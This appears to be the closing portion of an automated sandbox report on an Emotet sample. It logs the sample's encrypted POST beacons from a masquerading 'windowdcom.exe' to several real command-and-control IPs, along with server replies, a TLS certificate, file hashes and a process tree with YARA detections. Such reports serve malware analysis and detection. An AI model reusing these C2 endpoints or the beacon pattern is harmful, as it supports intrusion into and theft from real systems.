                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.349743167.114.153.15380C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Mar 28, 2021 19:31:40.734666109 CEST8809OUTPOST / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 167.114.153.153
                                                                                                                                                Content-Length: 420
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 1a d7 59 41 dc 17 11 dd a9 1c 01 8b 75 e0 96 cc 3c 04 50 4c 59 8e b3 38 e9 f3 3d 5c 70 4e 51 38 5e 81 6e dd 3d 4d b0 1e 4d e1 df 18 22 1b 8a ec b9 40 3c fc 6c 1e e8 2b 8b 2f e6 d9 6a ba 68 92 5c e4 8e 8b 74 06 11 57 4c 51 22 6b 4d d9 12 3f a2 ca 4d 8c 4c 72 4c d5 ae 06 50 f2 0b ff 93 10 3c 4c dd a6 1d 7c cb 0b 3e 5c 5b e8 52 7d 11 af 7f 57 1b db 09 ae d0 28 4f 8c 6e f4 be b5 aa 77 cb 7a 77 0a 12 8d 45 39 28 1a 81 c9 69 57 fd 1f d7 1e c8 cd d2 34 19 b1 9f df 2d 92 a7 0f 2c 07 62 82 58 2a 63 6b f4 f1 c1 76 60 bf 2a bb 71 f3 a2 15 2b 7f a1 b9 ec 3b 7c 3c 58 9f fc ae 67 47 1f 12 1c 1c 0f bc fe 16 f2 9e b3 c5 48 e7 10 e4 42 c3 97 ff db b9 5b 13 4e e0 7c 94 ac ef 64 99 89 a6 c8 0a 23 42 bf c2 2d 4f 7e 64 d1 77 1d 99 f7 23 32 cf 61 a1 90 83 0e 52 e5 1a 72 31 18 7e 1f 45 be 51 9c be 92 86 18 03 45 7f 58 fc 47 96 9f 14 b4 eb 2e f3 9b 74 83 bd 46 4b 11 4a 9a 95 2d e1 88 41 80 96 06 65 67 38 e0 e1 b1 d2 7c 83 9e 0b 84 89 45 52 29 df 21 50 0d fa c9 87 75 8b 64 ec 2f fb 1f ec ef 5d 82 26 98 ef 19 db a9 ca 8b 97 8d 28 73 0e 51 35 57 3c f1 ee 39 e2 28 7f 7c 33 45 7c 56 c9 7b 6d f7 7a d1 ef 8c 87 54 7f d0 b5 12 4a 00 77 53 30 bb 6f 14 04 ed 64 6e 6a 7c 34 0a c5 ff 58 84 7b 27 0b 86 b2 b4 be 17 2f fa 5e e8 e5 16 93 f4 d0 47 5d 41 d1 2d a2 69 39 87 a3 86 66
                                                                                                                                                Data Ascii: YAu<PLY8=\pNQ8^n=MM"@<l+/jh\tWLQ"kM?MLrLP<L|>\[R}W(OnwzwE9(iW4-,bX*ckv`*q+;|<XgGHB[N|d#B-O~dw#2aRr1~EQEXG.tFKJ-Aeg8|ER)!Pud/]&(sQ5W<9(|3E|V{mzTJwS0odnj|4X{'/^G]A-i9f
                                                                                                                                                Mar 28, 2021 19:31:40.871704102 CEST8810INHTTP/1.1 302 Found
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Vary: Origin, Accept
                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                Location: https://167.114.153.153/
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 46
                                                                                                                                                Date: Sun, 28 Mar 2021 17:31:40 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 31 36 37 2e 31 31 34 2e 31 35 33 2e 31 35 33
                                                                                                                                                Data Ascii: Found. Redirecting to https://167.114.153.153


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.349757178.62.39.238443C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Mar 28, 2021 19:35:51.646342993 CEST8953OUTPOST / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 178.62.39.238:443
                                                                                                                                                Content-Length: 404
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 7f ff 1f d0 a2 75 6e 6e 1f 92 d6 a6 dc e8 90 7e 4c 38 25 02 95 1d e0 e8 c7 57 09 e6 75 35 bc a5 fc ca 35 cc 54 c6 b2 5a 2a dc 5d de 03 44 14 67 e8 83 f3 c0 fc b9 0f cd de ce 7a 46 e1 41 52 48 ec 17 a5 82 29 da df b6 ab f6 47 41 74 f9 d8 5d 16 1c 3f 41 fc 59 87 97 ed e5 d9 0a 61 6e 19 01 42 94 eb 94 0a 6d a6 be 56 d0 ff bc 2b 8d ff 66 38 df cc 08 94 15 c8 4f cf 78 25 b2 8a 68 82 28 36 34 c0 65 5c 92 e0 6e 5d f5 3d 3f 5b 1b 00 87 95 34 09 8f e0 16 58 cb 70 75 ee 53 38 33 71 bc 5c 86 af a6 4b 5a 27 3f 9b 6e da c2 fb 82 de ca af 70 0d 6a 70 89 98 e0 6d 8b f3 38 ce f6 d1 c7 06 54 7b 3a f8 b1 21 2d 14 50 bf 62 16 e1 0c 01 e7 fa c7 44 ac 51 5b cc 45 2c fd 53 d1 a2 05 66 ea 60 d7 b8 fc ce cf 28 53 8f 50 af f7 3d 02 2b cf a1 11 e5 9c f2 71 d1 21 2e 98 6a 08 fb b2 d7 a2 dd cd 7b dd 5c 10 38 a3 da f0 b8 59 71 61 2f a1 cc d5 ff 5e 10 8d 91 a1 d2 85 16 68 a9 e2 b8 60 a3 2a 66 3e 7e 42 18 4c 38 44 a4 d0 e6 54 0c 95 0d 02 05 19 80 96 8c c1 39 8d 90 cc 0d 04 7f 2d 03 da 7a 2a 8c a0 99 74 43 e4 15 d6 de fd 78 1a 59 64 38 ba a7 6f a4 06 0d 1b 11 81 79 eb 46 03 8c 65 6f 6e d7 8f f0 dc b2 32 e6 71 24 69 21 42 0a 11 6d f9 29 5f 3b 90 86 91 cb a0 64 05 ed 94 52 2d 04 88 7a c7 fb 1b be 0d 1e ac 06 e7 6d e8 05 79 1e
                                                                                                                                                Data Ascii: unn~L8%Wu55TZ*]DgzFARH)GAt]?AYanBmV+f8Ox%h(64e\n]=?[4XpuS83q\KZ'?npjpm8T{:!-PbDQ[E,Sf`(SP=+q!.j{\8Yqa/^h`*f>~BL8DT9-z*tCxYd8oyFeon2q$i!Bm)_;dR-zmy
                                                                                                                                                Mar 28, 2021 19:35:51.695818901 CEST8954INHTTP/1.1 400 Bad Request
                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                Date: Sun, 28 Mar 2021 17:35:51 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 682
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                3192.168.2.34975879.172.249.82443C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Mar 28, 2021 19:36:22.692884922 CEST8956OUTPOST / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 79.172.249.82:443
                                                                                                                                                Content-Length: 388
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Raw: 11 1e 7c 5e b6 2e f2 1f 58 9d c0 f2 81 bd 05 3d 92 21 e7 5f 8f 87 5a 10 3c b5 f3 13 d4 93 1d c4 1a 8b 67 ff e9 26 d8 03 e4 08 44 19 af 2c 38 1c 74 98 02 a8 d1 85 e0 8b 5f c8 d6 36 02 ba 4e 89 93 1e d7 6b d1 63 aa 2d f5 10 a0 d0 40 51 8d 91 e0 a5 c4 71 fb 8a a1 0b 84 51 47 0b dc 7b 7e 8f a6 1a 6e 9d c2 bd 64 86 fe d0 22 43 6d 50 24 5d 54 fa cf d3 18 c1 1e 46 62 a3 70 49 86 72 06 ee 36 21 8a 37 b0 14 89 5a 79 aa 59 cd 4e 8d 24 50 6c 8f 11 0f c9 7c e4 c7 cd de 63 00 d4 3c 08 9d a6 19 a4 ac a5 c0 d2 e1 3d f7 7a d1 2d 50 b1 0a 57 46 92 a7 a6 4c 98 e0 e9 48 9f 37 70 93 e2 47 55 8b 79 d6 bc 28 67 cb a4 12 b4 9c b4 55 5e b1 e6 3e 6d 0f 87 bb a7 08 6b c6 47 6a 0c bd 60 85 d3 7b 6b cb 04 c1 04 6d ac 73 a3 c4 c3 32 23 7d 54 d9 a9 93 36 ab 8c 21 3a 0c 53 6f f3 5b b9 68 79 bc 0b 05 be f8 ca 18 e9 e1 db 1c 12 58 2c e8 a1 9e d0 17 84 e2 0a ac 61 49 ea b8 8d 43 95 49 46 ff c5 13 25 64 0d 21 f6 e6 a8 d0 27 df cf bb 3d c8 ce 07 87 51 94 b2 27 18 f4 2d 87 1e b5 30 b0 b7 b6 d6 9c f0 cd 96 75 80 db 63 39 59 19 11 2b 78 6f a9 a2 ba 7e 0f 62 90 c2 f3 36 73 b8 37 0c 0f 2d 73 9e f5 95 d0 9f e3 63 77 a8 dd 88 85 f3 c7 1b e7 38 d2 17 d0 f2 24 a5 49 f6 da c8 4f 51 f2 6f 4e
                                                                                                                                                Data Ascii: |^.X=!_Z<g&D,8t_6Nkc-@QqQG{~nd"CmP$]TFbpIr6!7ZyYN$Pl|c<=z-PWFLH7pGUy(gU^>mkGj`{kms2#}T6!:So[hyX,aICIF%d!'=Q'-0uc9Y+xo~b6s7-scw8$IOQoN
                                                                                                                                                Mar 28, 2021 19:36:22.743844032 CEST8956INHTTP/1.1 400 Bad Request
                                                                                                                                                Date: Sun, 28 Mar 2021 17:36:22 GMT
                                                                                                                                                Server: Apache/2.4.25 (Debian)
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                                                                                                                HTTPS Packets

                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                Mar 28, 2021 19:31:41.351313114 CEST167.114.153.153443192.168.2.349744CN=uwcodeforce.ca CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 16 21:47:22 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 17 22:47:22 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,051c64c77e60f3980eea90869b68c58a8
                                                                                                                                                CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: yxghUyIGb4.exe PID: 676 Parent PID: 5772

                                                                                                                                                General

                                                                                                                                                Start time:19:28:24
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Users\user\Desktop\yxghUyIGb4.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\user\Desktop\yxghUyIGb4.exe'
                                                                                                                                                Imagebase:0x820000
                                                                                                                                                File size:45568 bytes
                                                                                                                                                MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.195274651.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.196554240.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: yxghUyIGb4.exe PID: 4552 Parent PID: 676

                                                                                                                                                General

                                                                                                                                                Start time:19:28:25
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Users\user\Desktop\yxghUyIGb4.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\Desktop\yxghUyIGb4.exe
                                                                                                                                                Imagebase:0x820000
                                                                                                                                                File size:45568 bytes
                                                                                                                                                MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.196238760.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.203523658.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: windowdcom.exe PID: 5508 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:28:28
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                Imagebase:0x820000
                                                                                                                                                File size:45568 bytes
                                                                                                                                                MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.203168982.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.201989781.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: windowdcom.exe PID: 5860 Parent PID: 5508

                                                                                                                                                General

                                                                                                                                                Start time:19:28:28
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\windowdcom.exe
                                                                                                                                                Imagebase:0x820000
                                                                                                                                                File size:45568 bytes
                                                                                                                                                MD5 hash:ECBC4B40DCFEC4ED1B2647B217DA0441
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000000.202814564.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.1275643184.0000000000821000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low

                                                                                                                                                Analysis Process: svchost.exe PID: 2408 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:28:54
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: svchost.exe PID: 5568 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:29:05
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: svchost.exe PID: 4544 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:29:06
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: svchost.exe PID: 4788 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:29:07
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: SgrmBroker.exe PID: 5380 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:29:07
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                Imagebase:0x7ff6ad1b0000
                                                                                                                                                File size:163336 bytes
                                                                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: svchost.exe PID: 1260 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:29:08
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: MpCmdRun.exe PID: 6072 Parent PID: 1260

                                                                                                                                                General

                                                                                                                                                Start time:19:30:08
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                                Imagebase:0x7ff7a6080000
                                                                                                                                                File size:455656 bytes
                                                                                                                                                MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: conhost.exe PID: 2132 Parent PID: 6072

                                                                                                                                                General

                                                                                                                                                Start time:19:30:09
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6b2800000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: svchost.exe PID: 5968 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:33:12
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Analysis Process: svchost.exe PID: 1708 Parent PID: 568

                                                                                                                                                General

                                                                                                                                                Start time:19:33:16
                                                                                                                                                Start date:28/03/2021
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc
                                                                                                                                                Imagebase:0x7ff7488e0000
                                                                                                                                                File size:51288 bytes
                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >